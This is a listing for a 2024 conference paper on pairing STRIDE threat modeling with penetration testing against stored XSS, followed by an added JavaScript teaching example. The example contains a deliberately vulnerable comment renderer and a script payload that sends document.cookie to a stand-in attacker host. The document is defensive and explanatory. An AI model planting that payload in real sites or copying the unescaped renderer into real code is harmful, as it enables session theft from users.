Combining STRIDE and Penetration Testing for Improved Web Application Security: A Case Study on Stored XSS Vulnerabilities


Research area: Strategies



Conference: 2024 Beyond Technology Summit on Informatics International Conference (BTS-I2C)


Abstract

The increasing use of web-based document management applications has heightened security risks, particularly from stored Cross-Site Scripting (XSS), a vulnerability class that appears in the OWASP Top 10. This research investigates using STRIDE threat modeling to systematically identify and address security weaknesses in such applications. By integrating threat modeling with penetration testing, the study focuses on stored XSS vulnerabilities, which are commonly exploited to steal sensitive user information or hijack accounts. The STRIDE framework was applied to map potential threats, simulate real-world attack scenarios, and assess the system's security posture. The results show that combining STRIDE with penetration testing markedly improves the ability to detect and mitigate vulnerabilities, especially stored XSS. The study underscores the importance of structured threat modeling in modern cybersecurity practice and proposes future work to extend STRIDE to emerging technologies, such as cloud services and Internet of Things (IoT) environments, while integrating automated tools for dynamic threat adaptation.
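The abstract names the threat class (stored XSS in a document-management application) and the two lenses used to find it (a STRIDE mapping and a penetration test). The following is an added illustration, not code from the paper or from the application it studied: a minimal in-memory comment store showing the vulnerable render path beside an output-encoded one, a STRIDE mapping for this single finding, and the check a tester would run against the rendered page. The store, the function names, the attacker host and the payload are all constructed for this example.

```javascript
// Added example (not from the paper): stored XSS in a document-comment feature,
// the vulnerable render next to the hardened render, and a tester's check.

// Encode the five characters that are significant in an HTML text context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Persistence step: the sink stores attacker-controlled text verbatim.
// That is what makes the XSS "stored"; the bug is realised at render time.
function storeComment(store, author, body) {
  store.push({ author, body });
  return store.length - 1;
}

// Vulnerable rendering: untrusted values concatenated straight into HTML.
function renderCommentsUnsafe(store) {
  return store.map((c) => `<li><b>${c.author}</b>: ${c.body}</li>`).join("\n");
}

// Hardened rendering: every untrusted value is encoded for the context it
// lands in (here, HTML text). Same template, same data, no script execution.
function renderCommentsSafe(store) {
  return store
    .map((c) => `<li><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.body)}</li>`)
    .join("\n");
}

// Tester's check for the pentest phase: did an injected tag survive unencoded?
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

// STRIDE categories that this one finding touches, as used to drive the
// attack scenarios in the test plan (categorisation is this example's own).
const STRIDE_FOR_STORED_XSS = {
  Tampering: "attacker-controlled markup persisted in document comments",
  Spoofing: "stolen session token lets the attacker act as the victim",
  InformationDisclosure: "injected script exfiltrates cookies or document contents",
  ElevationOfPrivilege: "script runs in a higher-privileged viewer's session",
};

// Constructed payload: a classic cookie-exfiltration probe (hypothetical host).
const PAYLOAD =
  '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

// Run both render paths over the same stored data and report the outcome.
function demo() {
  const store = [];
  storeComment(store, "alice", "Please review section 3.");
  storeComment(store, "mallory", PAYLOAD);
  const unsafe = renderCommentsUnsafe(store);
  const safe = renderCommentsSafe(store);
  return {
    unsafe,
    safe,
    unsafeExecutes: containsLiveScript(unsafe), // true: the tag is live
    safeExecutes: containsLiveScript(safe),     // false: the tag is text
    strideCategories: Object.keys(STRIDE_FOR_STORED_XSS),
  };
}

const result = demo();
console.log("vulnerable render executes script:", result.unsafeExecutes);
console.log("hardened render executes script:  ", result.safeExecutes);
console.log(result.safe);
```

The check is deliberately crude (a regex for an opening script tag); a real test plan would cover event-handler attributes and other contexts as well, which is exactly the kind of scenario a STRIDE Tampering entry would enumerate.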


Authors
Dessy Ariami, Cyber Security Engineering, Politeknik Siber dan Sandi Negara, Bogor, Indonesia
Susila Windarta, Cyber Security Engineering, Politeknik Siber dan Sandi Negara, Bogor, Indonesia
Dimas Febriyan Priambodo, Cyber Security Engineering, Politeknik Siber dan Sandi Negara, Bogor, Indonesia

Paper information

Publication year: 2024
Citations: 64
Country of publication: Indonesia
Site: IEEE
